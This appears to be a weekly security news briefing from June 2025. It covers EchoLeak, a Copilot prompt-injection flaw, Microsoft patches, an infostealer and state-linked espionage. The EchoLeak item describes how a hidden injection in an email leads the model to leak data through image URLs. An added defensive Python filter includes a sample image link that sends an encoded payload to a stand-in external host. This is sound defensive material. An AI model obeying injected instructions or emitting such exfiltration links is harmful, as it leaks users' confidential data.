Cyber Security Weekly Briefing, 7-13 June

June 13, 2025

EchoLeak discovered, a 0-click vulnerability in Microsoft 365 Copilot

Researchers at Aim Labs have discovered a new critical vulnerability, called EchoLeak (CVE-2025-32711, CVSSv3 9.3 according to Microsoft), affecting Microsoft 365 Copilot. This flaw, fixed by Microsoft in May 2025, allowed an attacker to exfiltrate sensitive data without user interaction. The technique involves sending an email with a hidden prompt injection, designed to look like a corporate message.

Subsequently, when the user performs a related query in Copilot, the email is retrieved and processed by the RAG engine, which triggers the injected instructions. These induce the model to embed internal data in links or images that, when loaded, leak the information to an external server.

Although there is no indication of actual exploitation, EchoLeak marks the emergence of a new class of flaws, known as LLM Scope Violation, which exposes the risks of deep AI integration in enterprise environments.
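The exfiltration channel described above, model output that carries retrieved data inside a link or image URL, is one that output-side filtering can narrow before the answer is rendered. The following is an added example, not code from Aim Labs, Microsoft or this briefing: a Python sanitizer that removes markdown and HTML references to hosts outside an allowlist from assistant output and flags URLs whose query string or path carries a long opaque string. The `example.test` hosts, the allowlist, the sample output and the length thresholds are all constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts the assistant may reference in rendered output (constructed placeholder allowlist).
TRUSTED_HOSTS = {"intranet.example.test", "sharepoint.example.test"}

# Markdown image ![alt](url) / link [text](url); group 1 is "!" for images.
MD_REF = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)\)')
# HTML <img src="url"> as produced by some renderers.
HTML_IMG = re.compile(r'<img\b[^>]*\bsrc=["\']([^"\']+)["\'][^>]*>', re.IGNORECASE)

# Constructed sample of assistant output after a poisoned document was retrieved.
# The long query value is an arbitrary opaque string standing in for smuggled data.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "See the policy: [HR policy](https://intranet.example.test/hr/policy.pdf)\n"
    "![status](https://external.example.test/i.png"
    "?d=Q2xpZW50IGxpc3Q6IEFDTUUsIEdsb2JleCwgSW5pdGVjaDsgYnVkZ2V0IDQuMk0%3D)\n"
    "More details: [here](https://external.example.test/page)\n"
    '<img src="https://external.example.test/pixel.gif?u=42">\n'
)


def is_trusted(host, trusted=TRUSTED_HOSTS):
    """True if host is an allowlisted host or one of its subdomains."""
    host = (host or "").lower()
    return any(host == t or host.endswith("." + t) for t in trusted)


def carries_payload(url, max_len=64):
    """Heuristic (assumed threshold): a query string or path segment longer than
    max_len is treated as an opaque payload rather than a normal reference."""
    p = urlparse(url)
    if len(p.query) > max_len:
        return True
    return any(len(seg) > max_len for seg in p.path.split("/"))


def classify(url, trusted=TRUSTED_HOSTS):
    """Return the list of reasons a URL should be blocked; empty means it may stay."""
    reasons = []
    host = urlparse(url).hostname
    if host is None:
        return reasons  # relative reference, resolves within the assistant's own origin
    if not is_trusted(host, trusted):
        reasons.append("untrusted-host")
    if carries_payload(url):
        reasons.append("opaque-payload")
    return reasons


def sanitize_model_output(text, trusted=TRUSTED_HOSTS):
    """Strip blocked references from assistant output; return (clean_text, findings).

    The visible label is kept so the answer still reads, but the URL is dropped
    entirely so nothing is fetched from the outbound host when rendered."""
    findings = []

    def md_repl(m):
        bang, label, url = m.group(1), m.group(2), m.group(3)
        reasons = classify(url, trusted)
        if not reasons:
            return m.group(0)
        kind = "image" if bang else "link"
        findings.append({"kind": kind, "url": url, "reasons": reasons})
        return f"{label} [{kind} removed]"

    def img_repl(m):
        url = m.group(1)
        reasons = classify(url, trusted)
        if not reasons:
            return m.group(0)
        findings.append({"kind": "html-image", "url": url, "reasons": reasons})
        return "[image removed]"

    clean = MD_REF.sub(md_repl, text)
    clean = HTML_IMG.sub(img_repl, clean)
    return clean, findings


if __name__ == "__main__":
    clean, findings = sanitize_model_output(SAMPLE_OUTPUT)
    print(clean)
    for f in findings:
        print(f"blocked {f['kind']}: {f['url']} ({', '.join(f['reasons'])})")
```

Run stand-alone, the script prints the sanitized text with the three external references removed and lists each with its reasons; the intranet link survives untouched. A real deployment would log the findings as a detection signal (a retrieved document that makes the model emit outbound URLs is itself suspicious) and apply the filter on every render path, not only markdown.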


Microsoft fixes one critical 0-day and 65 additional vulnerabilities in June Patch Tuesday

Microsoft has released its June 2025 security bulletin, which fixes 66 flaws, including an actively exploited 0-day in WebDAV (CVE-2025-33053, CVSSv3 8.8) that allows remote code execution by tricking the user with a malicious URL. It also resolves another publicly disclosed vulnerability in the SMB client (CVE-2025-33073, CVSSv3 8.8) that allows elevation of privileges to SYSTEM without user interaction.

Of the total number of flaws, ten are considered critical (eight RCE, two elevation of privilege), while the remainder include information disclosure, denial of service, security bypass and impersonation flaws. In addition, multiple vulnerabilities were fixed in Office (Word, Excel, Outlook, PowerPoint, SharePoint) with CVSS scores between 8.4 and 8.8. Microsoft also released builds for Windows 10 and 11 with additional fixes, functional improvements and system restores.

Although no mass exploits have been reported, the presence of an active 0-day makes it urgent to apply these updates.


Myth Stealer: a rapidly evolving Rust-based infostealer

Researchers at Trellix identified Myth Stealer, an infostealer written in Rust and distributed through fraudulent gaming websites. This malware displays a fake window to appear legitimate while extracting credentials, cookies, and clipboard data. It employs evasion techniques such as string obfuscation using obfstr, system persistence, screenshot capture, sandbox environment checks, and in-memory execution via memexec. It targets Chromium- and Gecko-based browsers, as well as applications like Discord.

The malware is delivered through .exe, .rar, and .zip files, often disguised as games or related software. Its operators offer it via weekly or monthly subscriptions on Telegram, and it is frequently updated to avoid detection.


ConnectWise replaces ScreenConnect, ConnectWise Automate, and RMM certificates

ConnectWise has decided to replace the digital code signing certificates used to sign its ScreenConnect, ConnectWise Automate, and RMM tools, following a warning from a third-party researcher about possible misuse related to the installer's handling of configuration data, which could be exploited by an attacker with system-level access.


APT PurpleHaze and ShadowPad target cybersecurity vendors and global entities

SentinelOne revealed that between July 2024 and March 2025, China-nexus state-linked groups, including the PurpleHaze and ShadowPad operators, launched cyberespionage campaigns against more than 70 organizations across the government, financial, technology, research and media sectors, including security vendors such as SentinelOne itself.

One prominent target was a hardware logistics company supporting SentinelOne, and reconnaissance activity against Internet-facing servers was also detected. These intrusions employed backdoors such as GOREshell and ShadowPad and showed notable technical sophistication, including the use of ORB networks and ScatterBrain obfuscation.

In some cases, vulnerabilities such as CVE-2024-8963 and CVE-2024-8190 in Ivanti devices were exploited for initial access.
